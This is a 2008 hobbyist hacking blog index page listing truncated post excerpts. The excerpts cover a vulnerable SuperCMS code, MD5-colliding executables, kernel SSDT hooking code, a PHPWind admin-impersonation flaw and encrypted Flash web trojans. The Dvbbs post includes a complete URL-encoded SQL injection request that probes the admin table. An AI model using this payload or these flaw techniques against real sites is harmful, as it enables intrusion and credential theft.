ShadowHider's Blog
百度首页 | 百度空间
 
文章列表
 
2008-07-13 17:53

貌似没什么用

<%@ LANGUAGE = VBScript.Encode %>
<%#@~^EAAAAA==@#@&frsPjlDk@#@&BAMAAA==^#~@%>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><strong>A list of all server
variables : </strong> </font></p>
<p><BR>
<B

 
2008-07-07 14:05

转自wolffly 's blog

SuperCMS新闻文章内容管理系统是一套免费的ASP系统。目前很多高校和政府的二级网站都在用。产生漏洞的页面是 SuperCMS.asp
if not isEmpty(request("typeid")) then
typeid=request("typeid")
   else
typeid=1
   end if
if not isempty(request("page")) then
       currentPage=cint(request("page"))
 

 
2008-07-07 10:57

原来我总是很自信地以为:你有本事找到 MD5 的碰撞又如何?你难道还有本事让两个可执行文件的 MD5 一样,却又都能正常运行,并且可以做完全不同的事情么?
答:还真的可以.
引用
http://www.win.tue.nl/hashclash/SoftIntCodeSign/HelloWorld-colliding.exe
http://www.win.tue.nl/hashclash/S

 
2008-06-28 13:49

atapi dispatch地址和SSDT列表的地址是通过Ring3动态获取然后写入驱动再重新校验,这里我加了自己的代码,改了下,Ring0下实现
转自邪八


#include<ntddk.h>
#include<stdio.h>
ULONG * realssdt;
#define SEC_IMAGE   0x01000000
#pragma pack(1)
typedef struct ServiceDescriptorEntry {
   unsigned int *ServiceTableBase;
   unsigned int *ServiceCounterTableBase;
   unsigned int NumberOfServices;
 

 
2008-06-20 19:02

不知道这个过了有没有用

 
2008-06-20 15:37
 
2008-06-13 15:16

今天法律期末考试,差点没把我郁闷死。虽说是开卷吧,但大多数题书上都没有。

那堆案例分析的题基本就纯靠瞎扯,用小学生的逻辑评论一番^_^就看判卷老师怎么搞喽~~~

 
2008-06-03 15:58

漏洞原因是Mysql会舍弃没有用处的ASCII129-255,搜了资料也没有找到为什么,PW最大失误不是程序,而是没有把username设为唯一。

可以构造一个和某个管理人员名字一样的ID再加上一个无效的ASCII码进行注册,表中会出现二个一样的用户名,而forums.forumadmin字段里存的用户名,这样就可获得全部的前台权限。

使用PHP构造的测试代码。

<?php
if (empty($_GET['sub'])) {
    print <<<EOT
        
 
2008-06-03 15:54

漏洞公告: http://seclists.org/bugtraq/2008/May/0330.html
利用方式: 一个典型的sql注射漏洞,按照公告里说的用
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
就可触发.
漏洞分析:动

 
2008-06-03 15:51

从生成器逆向探寻SWF网马加密
作者:Raullen

Adobe Flash漏洞是这段时间的明星漏洞,大街小巷都闹的沸沸扬扬。但除了各别“吃草的”懂得个中奥妙,大多数的马迷们只能望马心叹,及时抓到了16、28、45、47、115等各个版本的恶意SWF也是无从下手。这是因为这个网马不同于传统货,并不以unescape,16进制这些字符串表达形式的变换来取悦于观众,因为溢出构造在Flash内部,赋予了制作者以更多的操作空间,可以通过编程来实现比较复杂的Shellcode加密。这也许也是将来网马的发展方向所在。
今日,在某大侠的

 
     
 
 
个人档案
 
zrxc
男, 16岁
北京 宣武区 
上次登录:
4天前
加为好友
 
   
 
文章分类
 
 
 
0day(12)
 
 
 
 
 
 
     
 
最新评论
   
文章评论|照片评论

 

稍后补上o(∩_∩)o...
 

转载请注明出处!!
 

- -~ 我猜没用
 

嘿嘿..

你猜猜看呢..
 
     
 
留言板
 

加油吖..
呵呵..
 

五一快乐!
 

你什么意思?
 

你能做网马?
 

首先表示歉意,如您空间模板出现问题,可能是使用了我共享的模板。因我更换空间时把相...
 
     
 
最新照片
 
   
 
最近访客
 
 

vistann

crackbase

Roxiel

lovecn1989

xuxialover

71dao

hackxi

Varrily
     
 
背景音乐
 
 
其它
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2008 Baidu